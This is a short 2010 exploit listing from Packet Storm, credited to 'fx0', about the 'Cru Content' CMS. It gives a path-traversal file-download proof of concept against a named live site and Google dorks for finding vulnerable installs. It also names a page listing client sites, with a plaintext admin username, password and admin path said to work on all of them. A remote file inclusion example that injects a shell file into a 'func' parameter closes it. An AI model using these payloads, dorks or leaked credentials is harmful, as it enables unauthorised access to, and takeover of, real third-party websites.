Cru Content CMS File Disclosure

2010-03-06T00:00:00
ID PACKETSTORM:86961
Type packetstorm
Reporter fx0
Modified 2010-03-06T00:00:00

Description

                                        
                                            `  
  
[~]"Cru Content" Remote File Download Vulnerability  
[~]CMS Site:crudigital.com.au<http://crudigital.com.au>  
[~]Dork:"Powered By Cru Content"  
[~]POC:www.cloudland.tv/cms/download.php?file=../index.php<http://www.cloudland.tv/cms/download.php?file=../index.php>  
[~]Found by fx0  
  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
  
[~]This vuln is just pure human stupidity  
[~]You can find vuln links here = http://www.warpstudio.com/hrvatski/reference/  
[~]For every site the username and the password is the same  
[~]Admin path /admin/  
[~]Username:atila  
[~]Password:bicbozji  
[~]Found by fx0.  
  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
  
[~]Dork: inurl:".php?func=page_cms"  
[~]Ex: www.site.com/index.php?func=<http://www.site.com/index.php?func=><shell.txt?>  
[~]Found by fx0.  
  
  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
  
ye something from me...  
  
  
  
`